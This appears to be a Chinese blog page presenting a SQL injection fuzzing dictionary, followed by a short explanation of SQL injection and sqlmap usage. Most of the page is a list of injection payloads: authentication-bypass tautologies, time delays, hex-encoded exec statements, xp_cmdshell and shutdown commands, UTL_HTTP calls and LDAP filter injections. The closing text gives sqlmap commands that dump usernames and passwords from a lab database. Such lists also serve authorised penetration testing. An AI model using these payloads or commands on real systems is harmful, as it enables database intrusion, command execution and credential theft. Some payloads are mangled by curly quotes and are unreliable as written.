SQLI FUZZ字典

“or “a”=“a
')or(‘a’=‘a
or 1=1–
‘or 1=1–
a’or’ 1=1–
"or 1=1–
‘or’a’=‘a
“or”="a’=‘a
‘or’’=’
‘or’=‘or’
1 or ‘1’=‘1’=1
1 or ‘1’=‘1’ or 1=1
'OR 1=1
“or 1=1
'xor
‘or 1=1/*
1’or’1’=‘1

a’ or 1=1–
“a”” or 1=1–”
or a = a
a’ or ‘a’ = ‘a
1 or 1=1
a’ waitfor delay ‘0:0:10’–
1 waitfor delay ‘0:0:10’–
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
a’
?
’ or 1=1
ý or 1=1 –
x’ AND userid IS NULL; –
x’ AND email IS NULL; –
anything’ OR ‘x’=‘x
x’ AND 1=(SELECT COUNT() FROM tabname); –
x’ AND members.email IS NULL; –
x’ OR full_name LIKE ‘%Bob%
23 OR 1=1
‘; exec master…xp_cmdshell ‘ping 172.10.1.255’–
‘%20or%20’’=’
‘%20or%20’x’='x
%20or%20x=x
‘)%20or%20(‘x’=‘x
0 or 1=1
’ or 0=0 –
" or 0=0 –
or 0=0 –
’ or 0=0 #
or 0=0 #"
or 0=0 #
’ or 1=1–
" or 1=1–
’ or ‘1’=‘1’–
’ or 1 --’
or%201=1
or%201=1 –
’ or 1=1 or ‘’=’
or 1=1 or “”=
’ or a=a–
or a=a
‘) or (‘a’=‘a
) or (a=a
hi or a=a
hi or 1=1 --"
hi’ or 1=1 –
hi’ or ‘a’=‘a
hi’) or (‘a’='a
“hi”") or ("“a”"="“a”
‘hi’ or ‘x’=‘x’;
@variable
,@variable
PRINT
PRINT @@variable
select
insert
as
or
procedure
limit
order by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
’ or username like '%
’ or uname like '%
’ or userid like '%
’ or uid like '%
’ or user like '%
exec xp
exec sp
'; exec master…xp_cmdshell
'; exec xp_regread
t’exec master…xp_cmdshell ‘nslookup www.google.com’–
–sp_password
\x27UNION SELECT
’ UNION SELECT
’ UNION ALL SELECT
’ or (EXISTS)
’ (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20

to_timestamp_tz
tz_offset
<>”’%😉(&+
‘%20or%201=1
%27%20or%201=1
%20$(sleep%2050)
%20’sleep%2050’
char%4039%41%2b%40SELECT
'%20OR
‘sqlattempt1
(sqlattempt2)
|
%7C
|
%2A%7C
(|(mail=))
%2A%28%7C%28mail%3D%2A%29%29
(|(objectclass=))
%2A%28%7C%28objectclass%3D%2A%29%29
(
%28
)
%29
&
%26
!
%21
’ or ‘’=’
x’ or 1=1 or ‘x’='y
/
//
//

/
a’ or 3=3–
“a”" or 3=3–"
’ or 3=3
ý or 3=3 –
"


’ –
–’;
’ ;
= ’
= ;
= –
\x23
\x27
\x3D \x3B’
\x3D \x27
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
‘or select *
admin’–
';shutdown–
’ or ‘x’=‘x
" or “x”=“x
‘) or (‘x’=‘x
" or 0=0 #
"’ or 1 --’”
" or 1=1 or “”="
" or “a”="a
“) or (“a”=“a
hi” or “a”=“a
hi” or 1=1 –
hi”) or (“a”=“a
<>”’%😉(&+
’ and ‘’ like ’
’ AnD ‘’ like ’
’ or ‘’ like ’
’ and ‘’ like '%
’ aND ‘’ like '%
’ and ‘’ like ‘’–
’ and 2>1–
’ and 2>3–
') and (‘x’='x
) and (1=1
¡® or 1=1 –
¡® or 3=3 –

  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQLi(Structured Query Language Injection)是一种利用Web应用程序中的安全漏洞,将恶意的SQL代码注入到用户输入的数据中的攻击方法。SQLMap是一种常用的自动化SQL注入工具,它可以帮助安全研究人员找到和利用这些漏洞。 使用SQLMap可以进行各种类型的SQL注入攻击,包括盲注和联合查询注入。在进行盲注时,SQLMap会发送一系列的测试语句,通过观察返回的结果来确定注入点的存在和注入语法的正确性。而在联合查询注入中,SQLMap会利用UNION SELECT语句将恶意代码注入到原始查询中,从而获取数据库中的敏感信息。 在使用SQLMap时,可以通过指定URL和一些参数来执行注入测试。例如,在执行基本的盲注测试时,可以使用以下命令:python sqlmap.py -u 127.0.0.1/sqli/less-38/?id= 1.数据库名 python sqlmap.py -u 127.0.0.1/sqli/less-38/?id= --dbs。这将测试目标URL中的参数id是否存在注入漏洞,并尝试获取数据库名称。 除了执行基本的SQL注入测试外,还可以使用SQLMap执行更复杂的攻击,如获取数据库中的表和列信息,以及获取用户表中的用户名和密码等敏感信息。例如,在注入漏洞被确认后,可以使用以下命令来获取用户表中的用户名和密码:python sqlmap.py -u http://localhost/sqli-labs-master/Less-4/?id=1 -D security -T users -C username,password --dump --batch。 总结来说,SQLi是一种通过注入恶意的SQL代码来攻击Web应用程序的方法,而SQLMap是一种常用的自动化SQL注入工具,可以帮助发现和利用这些漏洞,以获取敏感信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值